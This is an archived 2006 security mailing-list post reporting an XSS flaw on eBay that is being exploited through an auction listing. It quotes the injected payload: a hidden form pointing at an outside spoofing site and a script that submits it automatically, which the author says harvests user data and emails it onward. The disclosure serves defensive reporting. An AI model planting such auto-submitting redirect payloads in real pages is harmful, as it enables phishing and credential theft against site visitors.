lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <ab13993b0602281848t3f475a69q807209890e2f60d4@mail.gmail.com> Date: Wed Mar 1 02:49:19 2006 From: anthrax101 at gmail.com (Aaron Horst) Subject: Ebay XSS The linked auction demonstrates an XSS flaw within ebay: http://cgi.ebay.com/ebaymotors/Ford-Mustang-Just-L-K_W0QQitemZ4617729712QQcategoryZ6236QQrdZ1QQcmdZViewItem The affected code is below the line "On Feb-28-06 at 16:31:39 PST, seller added the following information:" <form name="xxx" action="http://wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html"> </form> <script> xxx.submit(); </script> The redirection page seems to be simple spoofing, and emails the data to cont_26_32@...oo.com. AnthraX101 -- AnthraX101 -- PGP Key ID# 0x4CD6D0BD Fingerprint: 8161 D008 3DAB 86C1 2CA3 AEDE 0E21 DBDE 4CD6 D0BD